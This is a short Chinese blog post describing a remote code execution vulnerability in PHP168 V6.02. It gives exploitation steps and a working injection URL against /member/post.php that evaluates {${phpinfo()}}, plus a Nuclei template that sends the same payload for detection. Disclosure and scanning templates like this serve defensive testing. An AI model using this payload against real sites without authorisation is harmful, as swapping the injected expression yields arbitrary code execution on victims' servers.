Nuclei关于php168 V6.02 的POC

文章描述了一个存在于PHP168v6.02中的远程代码执行漏洞,利用步骤包括注册用户并发送特定GET请求。同时提到了可以使用Nuclei工具进行检测,给出了Nuclei模板示例,通过匹配PHP信息来确认漏洞存在。该漏洞的严重性被评为高。

漏洞利用

这个漏洞是在 /member/post.php 中存在一个代码执行漏洞

利用步骤:

        1. 先注册一个用户
        2.执行下面代码,get方式就可以了

http://targetURL/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML

利用Nuclei 进行检测这个漏洞

id: php168-v602

info:
  name: php168-v6.02 - Remote Code Execution
  author: dr_set
  severity: high
  description: PHP168 V6.02 has a remote code execution vulnerability.
  reference: https://www.seebug.org/vuldb/ssvid-94372
  tags: remote, code execution, php168, rce

requests:
  - method: GET
    path:
      - "{
  
  {BaseURL}}/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML"
#    headers:
#        Cookie: ${cookie}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值